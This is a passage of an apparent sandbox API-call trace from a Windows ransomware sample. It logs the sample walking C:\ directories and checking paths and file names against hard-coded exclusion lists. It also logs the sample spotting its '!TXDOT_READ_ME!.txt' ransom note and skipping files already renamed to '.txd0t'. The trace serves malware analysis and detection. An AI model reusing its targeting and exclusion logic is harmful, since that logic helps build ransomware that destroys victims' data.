lpFindFileData=0x599f650*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0118.487] StrCmpW (psz1="BOOTNXT", psz2=".") returned 1 [0118.487] StrCmpW (psz1="BOOTNXT", psz2="..") returned 1 [0118.487] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0118.487] StrCmpW (psz1="BOOTSECT.BAK", psz2=".") returned 1 [0118.487] StrCmpW (psz1="BOOTSECT.BAK", psz2="..") returned 1 [0118.487] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0118.487] StrCmpW (psz1="Documents and Settings", psz2=".") returned 1 [0118.487] StrCmpW (psz1="Documents and Settings", psz2="..") returned 1 [0118.487] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0118.487] StrCmpW (psz1="ESD", psz2=".") returned 1 [0118.487] StrCmpW (psz1="ESD", psz2="..") returned 1 [0118.487] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0118.487] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0118.487] StrNCatW (in: psz1="C:\\", psz2="ESD", cchMax=1030 | out: psz1="C:\\ESD") returned="C:\\ESD" [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system32\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\syswow64\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\winsxs\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\roaming\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\local\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\locallow\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\all users\\microsoft\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\inetpub\\logs\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\boot\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\perflogs\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\programdata\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\drivers\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\wsus\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\efstmpwp\\") returned 0x0 [0118.487] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\$recycle.bin\\") returned 0x0 [0118.488] StrStrIW (lpFirst="C:\\ESD", lpSrch="crypt_detect") returned 0x0 [0118.488] StrStrIW (lpFirst="C:\\ESD", lpSrch="cryptolocker") returned 0x0 [0118.488] StrStrIW (lpFirst="C:\\ESD", lpSrch="ransomware") returned 0x0 [0118.488] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\WINDOWS") returned 0x0 [0118.488] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files (x86)") returned 0x0 [0118.488] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files") returned 0x0 [0118.488] GetProcessHeap () returned 0xe30000 [0118.488] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48e) returned 0xf0daf8 [0118.488] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ESD", cchMax=1038 | out: psz1="C:\\ESD") returned="C:\\ESD" [0118.488] StrNCatW (in: psz1="C:\\ESD", psz2="\\*", cchMax=1038 | out: psz1="C:\\ESD\\*") returned="C:\\ESD\\*" [0118.488] FindFirstFileW (in: lpFileName="C:\\ESD\\*", lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0118.489] StrCmpW (psz1=".", psz2=".") returned 0 [0118.489] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0118.489] StrCmpW (psz1="..", psz2=".") returned 1 [0118.489] StrCmpW (psz1="..", psz2="..") returned 0 [0118.489] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0118.489] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0118.489] GetProcessHeap () returned 0xe30000 [0118.489] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0118.489] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab460c6f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0118.489] StrCmpW (psz1="hiberfil.sys", psz2=".") returned 1 [0118.489] StrCmpW (psz1="hiberfil.sys", psz2="..") returned 1 [0118.489] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x5acc9565, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0118.489] StrCmpW (psz1="Logs", psz2=".") returned 1 [0118.489] StrCmpW (psz1="Logs", psz2="..") returned 1 [0118.489] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0118.489] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0118.489] StrNCatW (in: psz1="C:\\", psz2="Logs", cchMax=1030 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\boot\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0118.489] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch="crypt_detect") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch="cryptolocker") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch="ransomware") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0118.490] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0118.490] GetProcessHeap () returned 0xe30000 [0118.490] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x490) returned 0xf0daf8 [0118.490] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.490] StrNCatW (in: psz1="C:\\Logs", psz2="\\*", cchMax=1040 | out: psz1="C:\\Logs\\*") returned="C:\\Logs\\*" [0118.490] FindFirstFileW (in: lpFileName="C:\\Logs\\*", lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x5acc9565, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0118.490] StrCmpW (psz1=".", psz2=".") returned 0 [0118.490] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x5acc9565, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0118.491] StrCmpW (psz1="..", psz2=".") returned 1 [0118.491] StrCmpW (psz1="..", psz2="..") returned 0 [0118.491] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59702ac0, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x59702ac0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x59702ac0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0118.491] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0118.491] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0118.491] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.491] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.491] StrNCatW (in: psz1="C:\\Logs\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1040 | out: psz1="C:\\Logs\\!TXDOT_READ_ME!.txt") returned="C:\\Logs\\!TXDOT_READ_ME!.txt" [0118.491] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0118.491] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0118.491] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0118.491] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5980dd41, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Application.evtx.txd0t", cAlternateFileName="APPLIC~1.TXD")) returned 1 [0118.491] StrCmpW (psz1="Application.evtx.txd0t", psz2=".") returned 1 [0118.491] StrCmpW (psz1="Application.evtx.txd0t", psz2="..") returned 1 [0118.491] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.491] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.491] StrNCatW (in: psz1="C:\\Logs\\", psz2="Application.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Application.evtx.txd0t") returned="C:\\Logs\\Application.evtx.txd0t" [0118.491] PathFindExtensionW (pszPath="Application.evtx.txd0t") returned=".txd0t" [0118.491] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.491] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59702ac0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="HardwareEvents.evtx.txd0t", cAlternateFileName="HARDWA~1.TXD")) returned 1 [0118.491] StrCmpW (psz1="HardwareEvents.evtx.txd0t", psz2=".") returned 1 [0118.492] StrCmpW (psz1="HardwareEvents.evtx.txd0t", psz2="..") returned 1 [0118.492] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.492] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.492] StrNCatW (in: psz1="C:\\Logs\\", psz2="HardwareEvents.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\HardwareEvents.evtx.txd0t") returned="C:\\Logs\\HardwareEvents.evtx.txd0t" [0118.492] PathFindExtensionW (pszPath="HardwareEvents.evtx.txd0t") returned=".txd0t" [0118.492] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.492] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59833cec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Internet Explorer.evtx.txd0t", cAlternateFileName="INTERN~1.TXD")) returned 1 [0118.492] StrCmpW (psz1="Internet Explorer.evtx.txd0t", psz2=".") returned 1 [0118.492] StrCmpW (psz1="Internet Explorer.evtx.txd0t", psz2="..") returned 1 [0118.492] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.492] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.492] StrNCatW (in: psz1="C:\\Logs\\", psz2="Internet Explorer.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Internet Explorer.evtx.txd0t") returned="C:\\Logs\\Internet Explorer.evtx.txd0t" [0118.492] PathFindExtensionW (pszPath="Internet Explorer.evtx.txd0t") returned=".txd0t" [0118.492] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.492] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59728c0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Key Management Service.evtx.txd0t", cAlternateFileName="KEYMAN~1.TXD")) returned 1 [0118.492] StrCmpW (psz1="Key Management Service.evtx.txd0t", psz2=".") returned 1 [0118.492] StrCmpW (psz1="Key Management Service.evtx.txd0t", psz2="..") returned 1 [0118.492] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.492] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.492] StrNCatW (in: psz1="C:\\Logs\\", psz2="Key Management Service.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Key Management Service.evtx.txd0t") returned="C:\\Logs\\Key Management Service.evtx.txd0t" [0118.492] PathFindExtensionW (pszPath="Key Management Service.evtx.txd0t") returned=".txd0t" [0118.492] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.492] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5974eff9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", cAlternateFileName="MICROS~1.TXD")) returned 1 [0118.492] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", psz2=".") returned 1 [0118.492] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", psz2="..") returned 1 [0118.492] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.492] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.492] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t" [0118.492] PathFindExtensionW (pszPath="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t") returned=".txd0t" [0118.492] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.492] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5974eff9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", cAlternateFileName="MICROS~2.TXD")) returned 1 [0118.492] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", psz2=".") returned 1 [0118.492] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", psz2="..") returned 1 [0118.492] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.492] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.493] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t" [0118.493] PathFindExtensionW (pszPath="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t") returned=".txd0t" [0118.493] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.493] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x597c25c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", cAlternateFileName="MICROS~3.TXD")) returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.493] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.493] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.493] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t" [0118.493] PathFindExtensionW (pszPath="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t") returned=".txd0t" [0118.493] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.493] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59833cec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", cAlternateFileName="MICROS~4.TXD")) returned 1 [0118.493] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", 